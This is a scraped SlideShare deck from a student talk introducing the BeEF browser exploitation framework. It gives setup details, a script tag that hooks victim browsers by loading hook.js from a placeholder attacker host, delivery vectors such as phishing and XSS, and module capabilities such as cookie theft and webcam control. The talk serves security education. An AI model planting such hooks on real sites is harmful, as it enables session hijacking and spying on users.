Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Saurabh chaudhary
sudosaurabh@protonmail.com
www.about.me/saurabhtheone
BeEF
The Browser Exploitation Framework
2
WHO AM I
▹I am saurabh
▹3rd year c.S.E @l.N.C.T.S bhopal
▹Bug bounty researcher on bugcroud
and hackerone
▹2 reserch pap...
Overview
• What is BeEF?
• Getting started
• Browser hooking
• Attack vectors/exploits & examples
• Demo
• Q & A
What is BeEF?
• Short for “Browser Exploitation Framework”
• At a basic level, it allows an attacker to control a victims ...
Getting Started
• Installed by default on Kali Linux
• Can also be downloaded from http://beefproject.com/
• App directory...
Logging In…
Hooking Browsers
• Must be able to inject Javascript in target’s browser
• <script src=“http://attackerip:3000/hook.js”></...
Fundamentals
• Cross-Site Scripting (XSS) allows arbitrary execution of client side code
(ie. Javascript/HTML, etc.). Usua...
Attack Vectors
• Social Engineering/Phishing - Lure or convince victim to
attacker controlled server hosting BeeF
• Open R...
BeEF
Architecture [3]
Phishing &
Social Engineering
It only takes one wrong click…
XSS Hooking
BeeF hook.js injected via URL
URL Obfuscation
Payloads and phishing links can be obfuscated and shortened
using URL shorteners… (example: https://goo.gl...
Stored XSS
A single stored XSS flaw can yield many hooked clients
depending on the size and use of the site…
Man-In-The-Middle
Injects a small hook.js into every web request intercepted.
Can also be done using DNS spoofing as well…
Web UI
Tracks client connections (ie. hooked browsers) and
allows an attacker to run modules
• Gather intel on target system/browser
• Retrieve session cookies
• Redirect target to malicious URL’s
• Change site cont...
BeEF Modules
Browser Hacking
Methodology
• Gaining control • Attacking extensions
• Fingerprinting • Attacking web applications
• Retai...
Fingerprinting
REQ
Retain Control
Attacking Users
Session Hijacking
Form Sniffing
Webcam Control
Client-Side Request Forgery
• Can be used to make internal or external requests from the victim’s PC
• Depending on severi...
CSRF Exploits
Tunneling Proxy
Internal Network Mapping
Exploits…
Exploiting Browsers Using Java
Automating Modules
By editing autorun.rb, we can automatically load
specific modules and set options whenever a new
BeEF h...
Demo
Recommended Reading
Questions?
Beef saurabh
Upcoming SlideShare
Loading in …5
×

Beef saurabh

85 views

Published on

BeEF Browser Exploitation Framework
null Bhopal 25 march

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Beef saurabh

  1. 1. Saurabh chaudhary sudosaurabh@protonmail.com www.about.me/saurabhtheone BeEF The Browser Exploitation Framework
  2. 2. 2 WHO AM I ▹I am saurabh ▹3rd year c.S.E @l.N.C.T.S bhopal ▹Bug bounty researcher on bugcroud and hackerone ▹2 reserch papers on cyber security ▹Many security hall of fames and national award winner in science and tech. 2
  3. 3. Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
  4. 4. What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
  5. 5. Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
  6. 6. Logging In…
  7. 7. Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
  8. 8. Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
  9. 9. Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
  10. 10. BeEF Architecture [3]
  11. 11. Phishing & Social Engineering It only takes one wrong click…
  12. 12. XSS Hooking BeeF hook.js injected via URL
  13. 13. URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
  14. 14. Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
  15. 15. Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
  16. 16. Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
  17. 17. • Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
  18. 18. BeEF Modules
  19. 19. Browser Hacking Methodology • Gaining control • Attacking extensions • Fingerprinting • Attacking web applications • Retain control • Attacking browsers • Attacking users • Attacking networks
  20. 20. Fingerprinting REQ
  21. 21. Retain Control
  22. 22. Attacking Users Session Hijacking
  23. 23. Form Sniffing
  24. 24. Webcam Control
  25. 25. Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
  26. 26. CSRF Exploits
  27. 27. Tunneling Proxy
  28. 28. Internal Network Mapping
  29. 29. Exploits…
  30. 30. Exploiting Browsers Using Java
  31. 31. Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
  32. 32. Demo
  33. 33. Recommended Reading
  34. 34. Questions?

×